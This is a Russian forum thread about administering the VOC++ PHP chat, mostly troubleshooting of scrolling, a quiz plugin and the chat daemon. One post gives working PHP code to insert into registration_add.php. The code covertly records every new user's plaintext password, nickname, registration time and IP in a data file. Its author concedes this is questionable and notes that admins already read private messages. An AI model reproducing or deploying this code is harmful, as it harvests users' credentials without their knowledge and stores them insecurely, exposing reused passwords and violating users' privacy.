VOC ++ (чат)

Статус
В этой теме нельзя размещать новые ответы.
у кого то есть прокрутка без демона?
 
у кого то есть прокрутка без демона?

php_tail прокручивает без демона.


Поставил викторинку 2.0.4 теперь при неотвеченном вопросе выдаёт - Никто не ответил на вопрос... Следующий через 30 секунд. Правильный ответ - <{ANSWER}>

Гдей-то посмотреть, я раньше исправлял, сча не могу вспомнить где.
:confused:
 
Добрался до компа с интернетом:D
Вот в общем возникала необходимость записывать всех новых зарегистрированных, с их паролем, айпихом с которого регистрировались и временем регистрации. Сделал, может кому пригодится.
Открываем файл registration_add.php из корня чата, находим строки:
PHP:
$passwd1 = str_replace("\t","",$passwd1);
$passwd2 =  str_replace("\t","",$passwd2);
После них вставляем следующее:
PHP:
//запись пароля Doctor_zlo начало
$data1 = date("d.m.Y");
$time1 = date("H:i");
$ip=$_SERVER['REMOTE_ADDR'];
	$file=$data_path."password.dat";

if(is_file($file)){ //Проверка файла
$fo=fopen($file,"a"); //Открываем 
$res="$new_user_name|$passwd1|$data1|$time1|$ip \n"; //Формируем строку  
//юзер|пароль1|дата|время|ip

$fw=fputs($fo,$res); //Запись
fclose($fo); //Закрыть
}

// конец записи
Создаем в папке data файл password.dat даем права на запись. Все. Теперь вся информация сохраняется в файле password.dat из папки дата, и имеет такой вид:
Ник|Пароль|Дата|Время|ip
p.s. С одной стороны писать пароли юзверей вроде не очень хорошо, а с другой стороны, приват то читаем...:)
p.s.s. Милых дам с праздником!!!
 
php_tail прокручивает без демона.


Поставил викторинку 2.0.4 теперь при неотвеченном вопросе выдаёт - Никто не ответил на вопрос... Следующий через 30 секунд. Правильный ответ - <{ANSWER}>
:confused:

Ещё заметил, что вопросы задаёт из близ лежащих, у меня уже второй день трафит одним футболом, т.е. рандом кривовато работать стал в этой викторине.
 
Ещё заметил, что вопросы задаёт из близ лежащих, у меня уже второй день трафит одним футболом, т.е. рандом кривовато работать стал в этой викторине.
ты запускал скрипт рандомизации ?
 
В чем может быть проблема, в режиме tail с запущеным демоном- белое окно. А как только удалаю папку browser из папки с дизом, сообщения появляються но нет прокрутки и после каждого сообщения ставиться ноль. Если кто сталкивался подскажите
 
В чем может быть проблема, в режиме tail с запущеным демоном- белое окно. А как только удалаю папку browser из папки с дизом, сообщения появляються но нет прокрутки и после каждого сообщения ставиться ноль. Если кто сталкивался подскажите

Белое окно - то есть сообщения не идут? Это значит что демон не запущен, на каком ОС пытаешься запустить демона?
 
да, сообщения не идут, запускаю под винду, демон запущен
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху